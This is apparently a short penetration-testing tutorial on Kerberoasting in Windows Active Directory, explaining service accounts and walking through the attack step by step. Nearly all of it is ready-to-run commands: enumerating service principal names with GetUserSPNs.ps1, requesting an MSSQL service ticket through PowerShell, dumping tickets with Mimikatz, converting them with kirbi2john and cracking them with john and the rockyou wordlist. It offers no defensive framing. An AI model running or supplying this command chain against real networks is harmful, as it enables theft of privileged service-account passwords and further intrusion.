Service-Account-Attack
A service account is a “non-human” account that is used to run services or applications. Service accounts are not administrative accounts, or other “human” accounts, used interactively by administrators or other employees. Service accounts also often have privileged access to computers, applications, and data, which makes them highly valuable to attackers.
Extracting Service Account Passwords with Kerberoasting
Kerberoasting takes advantage of how service accounts leverage Kerberos authentication with Service Principal Names (SPNs).
First we need to find the Service Principle names using GetUserSPNs.ps1.
.\GetUserSPNs.ps1
We will go for MSSQLSvc.
Request Service Tickets for service account SPNs
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/x.y.com:1433"
Extract Service Tickets Using Mimikatz
.\mimikatz.exe
privilege::debug
kerberos::list /export
We’ve successfully imported .kirbi files. Grab the MSSQL one, and download it to attacker machine.
Crack the Tickets
We gonna use kirbi2john.py to get john hash and crack it using john.
python3 kirbi2john.py -o hash mssql.kirbi
Now the hash is in john format. We can try to crack it.
john hash --wordlist=/home/kali/Downloads/rockyou.txt
john hash --show